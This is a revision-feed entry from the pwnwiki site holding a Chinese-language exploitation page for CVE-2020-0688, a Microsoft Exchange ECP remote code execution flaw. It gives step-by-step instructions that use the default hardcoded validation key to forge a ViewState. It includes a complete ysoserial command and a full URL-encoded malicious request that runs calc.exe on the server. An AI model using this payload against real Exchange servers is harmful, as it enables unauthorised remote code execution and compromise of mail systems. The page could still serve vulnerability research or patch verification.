https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2020-0688_%E5%BE%AE%E8%BB%9FEXCHANGE%E6%9C%8D%E5%8B%99%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E 2026-04-15T08:41:31Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2020-0688_%E5%BE%AE%E8%BB%9FEXCHANGE%E6%9C%8D%E5%8B%99%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=1654&oldid=prev 2021-04-14T07:55:22Z

<p>Created page with &quot;==影響版本== exchange 2010、2013、2016、2019 ==漏洞利用== 1、獲取ViewStateUserKey值 &lt;pre&gt; /ecp/default.aspx &lt;/pre&gt; F12打開開發工具的Network選項，然...&quot;</p> <p><b>New page</b></p><div>==影響版本==<br /> exchange 2010、2013、2016、2019<br /> <br /> ==漏洞利用==<br /> 1、獲取ViewStateUserKey值<br /> &lt;pre&gt;<br /> /ecp/default.aspx<br /> &lt;/pre&gt;<br /> F12打開開發工具的Network選項，然後按F5重新發送請求。我們需要找到/ecp/default.aspx的響應（NET_SessionId）<br /> <br /> 2、獲取取VIEWSTATEGENERATOR值：<br /> 同樣在/ecp/default.aspx的響應包內，直接搜索關鍵詞即可。<br /> <br /> 或使用document.getElementById(&quot;VIEWSTATEGENERATOR&quot;).value<br /> <br /> 如果發現沒有改字段，是因為系統沒有安裝KB2919355補丁，更新該補丁後可顯示，但是該字段值基本唯一，不需要刻意獲得。<br /> <br /> 3.整理已知參數<br /> --validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF（默認，漏洞產生原因）<br /> --validationalg = SHA1（默認，漏洞產生原因）<br /> --generator = B97B4E27（基本默認）<br /> --viewstateuserkey = d673d1a4-1794-403e-ab96-e283ca880ef2（手工獲取，變量，每次登陸都不一致）<br /> <br /> 4.生成payload:<br /> &lt;pre&gt;<br /> .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c &quot;calc.exe&quot; --validationalg=&quot;SHA1&quot; --validationkey=&quot;CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF&quot; --generator=&quot;B97B4E27&quot; --viewstateuserkey=&quot;d673d1a4-1794-403e-ab96-e283ca880ef2&quot; --isdebug --islegacy<br /> &lt;/pre&gt;<br /> <br /> 上面ysoserial.exe生成的payload要用URL Encode編碼<br /> <br /> <br /> 完整示例：<br /> &lt;pre&gt;<br /> https://192.168.1.248/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&amp;__VIEWSTATE=%2FwEyhAYAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAACmBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI%2BDQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IiIgT2JqZWN0VHlwZSA9ICJ7IHg6VHlwZSBEaWFnOlByb2Nlc3N9IiBNZXRob2ROYW1lID0gIlN0YXJ0IiA%2BDQogICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc%2BY2FsYy5leGU8L1N5c3RlbTpTdHJpbmc%2BDQogICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM%2BDQogICAgPC9PYmplY3REYXRhUHJvdmlkZXI%2BDQo8L1Jlc291cmNlRGljdGlvbmFyeT4Lp73ado0NJN2PSSnfOoN9h4H7xCU%3D<br /> &lt;/pre&gt;<br /> <br /> 成功彈出計算器。</div>

Pwnwiki